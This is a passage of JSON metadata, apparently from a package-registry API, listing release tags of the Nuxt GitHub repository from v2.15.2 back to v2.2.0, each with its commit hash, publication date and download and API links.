v2.15.2/manifests"},{"name":"v2.15.1","sha":"95daddf43c3b9e9474870631727755ecd2e94319","kind":"tag","published_at":"2021-02-19T16:39:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1/manifests"},{"name":"v2.15.0","sha":"dcfb42b77221f559e7ccb09edd5c2a2004c5bc6b","kind":"tag","published_at":"2021-02-15T11:06:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0/manifests"},{"name":"v2.14.12","sha":"bde4c5f6b0e643716d97027cdd185891ada02f7f","kind":"tag","published_at":"2020-12-16T13:15:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12/manifests"},{"name":"v2.14.11","sha":"d85f4b92642f4668463deb286524d424e57a1f62","kind":"tag","published_at":"2020-12-09T23:21:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11/manifests"},{"name":"v2.14.10","sha":"e97051adfafb9517cabbfd9b87a02e8c37ce949e","kind":"tag","published_at":"2020-12-07T10:30:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10/manifests"},{"name":"v2.14.9","sha":"e9f380c9e6b729ab77b38babba6ad15e95b4efa8","kind":"tag","published_at":"2020-12-02T10:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9/manifests"},{"name":"v2.14.8","sha":"68d8fb84872b807b2149756bb97a84961854a2c3","kind":"tag","published_at":"2020-12-01T11:06:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8/manifests"},{"name":"v2.14.7","sha":"265d0e7aac3df9f83f323c4d2dba11434956fe9b","kind":"tag","published_at":"2020-10-15T16:29:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7/manifests"},{"name":"v2.14.6","sha":"41176577ad71a8b91a91ca8f458fd64a278dd88d","kind":"tag","published_at":"2020-09-21T10:46:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6/manifests"},{"name":"v2.14.5","sha":"3b037720f2edc3e351d200bbb8525df1e93d7aad","kind":"tag","published_at":"2020-09-10T12:36:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5/manifests"},{"name":"v2.14.4","sha":"1a77fba4eb247faa3f1c8ec0fa49ce372abeb1d8","kind":"tag","published_at":"2020-08-27T10:26:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4/manifests"},{"name":"v2.14.3","sha":"5e9d759d7bee6a3d32e16ef05eef988e882c600a","kind":"tag","published_at":"2020-08-16T17:04:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3/manifests"},{"name":"v2.14.2","sha":"34c56722c8c97c0c6a59ecfbc5836c38047e4572","kind":"tag","published_at":"2020-08-16T10:59:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2/manifests"},{"name":"v2.14.1","sha":"c30499d7e02cd6d8b51d97ee7d7a537d8a59f63b","kind":"tag","published_at":"2020-08-04T16:37:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1/manifests"},{"name":"v2.14.0","sha":"60f68638cb80ab461c5b02be34e8797677bd8dd1","kind":"tag","published_at":"2020-07-27T17:25:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0/manifests"},{"name":"v2.13.3","sha":"e3821ba78c23fafa753941a0c206bd23e39dd678","kind":"tag","published_at":"2020-07-02T18:08:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3/manifests"},{"name":"v2.13.2","sha":"c998072c94eef659d45819eaa2b18897b8923538","kind":"tag","published_at":"2020-06-26T19:03:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2/manifests"},{"name":"v2.13.1","sha":"56b158e7d689ba9f57e7aa83d672f5f32b18767b","kind":"tag","published_at":"2020-06-24T08:38:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1/manifests"},{"name":"v2.13.0","sha":"dbecbe4adae6a7ae172eb01a232d1804c7b996bc","kind":"tag","published_at":"2020-06-18T17:45:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0/manifests"},{"name":"v2.12.2","sha":"fb33bda6d114cde19b029ab71c810032ef51184f","kind":"tag","published_at":"2020-03-31T10:43:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2/manifests"},{"name":"v2.12.1","sha":"8d355956d49c71349d165c4ca7531107e20d7b27","kind":"tag","published_at":"2020-03-25T19:22:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1/manifests"},{"name":"v2.12.0","sha":"205a089f833f96298d9bd723aea15b93618ec05d","kind":"tag","published_at":"2020-03-17T16:45:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0/manifests"},{"name":"v2.11.0","sha":"7af9ec8c23d247b22f71866b7b5dcd100f08048d","kind":"tag","published_at":"2019-12-17T10:23:56.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0/manifests"},{"name":"v2.10.2","sha":"f6aa45dda605cae2ea51f7413c97190a7a02cb88","kind":"commit","published_at":"2019-10-21T21:16:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2/manifests"},{"name":"v2.10.1","sha":"624c4c058e47fd36c484efaf1494b762f585f633","kind":"tag","published_at":"2019-10-11T08:11:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1/manifests"},{"name":"v2.10.0","sha":"c17afa77a7c7490863c2040c8f448ba80082a891","kind":"tag","published_at":"2019-10-02T11:44:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0/manifests"},{"name":"v2.9.2","sha":"c8ee9a660809e856c28d8678c6a632bbdd6ed00f","kind":"tag","published_at":"2019-08-28T11:32:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"0157b971de97daecf2fadeafa5596ddaa30cdb28","kind":"tag","published_at":"2019-08-20T11:13:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"ce3b4569613866a69b96f0f89aa2bb7d9810f8c4","kind":"tag","published_at":"2019-08-20T08:24:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0/manifests"},{"name":"v2.8.1","sha":"2fabea9402864828fe9aafe8b0d13bcc674a1b3b","kind":"tag","published_at":"2019-06-04T20:28:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"82ec7b7dedfbc3a01b981a0ef72375814e023291","kind":"tag","published_at":"2019-05-30T17:09:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0/manifests"},{"name":"v2.7.1","sha":"0f609dfb3772ec2682bf67c42762df6041dab034","kind":"tag","published_at":"2019-05-14T18:56:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"5a98230ec617582f7b9393ad27e20fb5a1e6aa04","kind":"tag","published_at":"2019-05-14T12:38:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0/manifests"},{"name":"v2.6.3","sha":"2108cd669c56bb2e566c35ac73d8e693b5ce5c54","kind":"tag","published_at":"2019-04-25T08:43:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"8d14cd4781095dff46a57ae05d60bbaccefb0fbd","kind":"tag","published_at":"2019-04-21T11:22:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"c0776eb2d78f839d2b1249765d2eb117b5f32d2e","kind":"tag","published_at":"2019-04-04T17:58:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"0e51676731e975226a7135003b941b9077256641","kind":"tag","published_at":"2019-04-04T17:06:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"5d7757bf299c724bb52df529c5dbd1a341b19951","kind":"tag","published_at":"2019-03-21T21:48:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"e2c296321b8f70c3e977ed11a0825870a2cc528a","kind":"tag","published_at":"2019-03-21T13:07:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"0ad13e04d2cae232d807ba0dd100b8f3f7bbb010","kind":"commit","published_at":"2019-02-26T10:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5/manifests"},{"name":"v2.4.3","sha":"13e494c0f0013252994eb0de0c4d92bd507b119d","kind":"tag","published_at":"2019-02-06T15:56:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"32b0f155c97a5c7f7cb7cc450274e10a492c9c39","kind":"tag","published_at":"2019-01-30T15:15:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2/manifests"},{"name":"v2.4.0","sha":"5f221b4b7e39e4804bde682b2e71780a7a1e2845","kind":"tag","published_at":"2019-01-28T17:41:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0/manifests"},{"name":"v1.4.5","sha":"c8962964b8ced4c703804ed9cc5e54c6d486a321","kind":"tag","published_at":"2018-11-27T17:37:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5/manifests"},{"name":"v2.3.4","sha":"16c5b892fa3104992f3a6778ac97a0fcb1ca657c","kind":"tag","published_at":"2018-11-26T17:50:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4/manifests"},{"name":"v2.3.2","sha":"205c9d38156c60d93248b9d973a615eee7355f22","kind":"tag","published_at":"2018-11-20T20:49:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"f75a4423354f16603a6b733ca12d873e501f4442","kind":"tag","published_at":"2018-11-16T19:28:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1/manifests"},{"name":"v1.4.4","sha":"8fb8376ff70b9db5feda4492009b0fb7d3e2884a","kind":"tag","published_at":"2018-10-19T14:00:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"f5aff938f7742624708b4eecc7a2b003c1a1d161","kind":"tag","published_at":"2018-10-19T13:45:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3/manifests"},{"name":"v2.3.0","sha":"dbf3ccc4c142083a76fbc4f3281f04e9b3044b79","kind":"commit","published_at":"2018-10-17T21:35:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"e3b72ded5c56b62ca25f180390a1d60ce8123b5b","kind":"tag","published_at":"2018-10-13T19:07:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.2.0","html_url":"https://github.com/nuxt/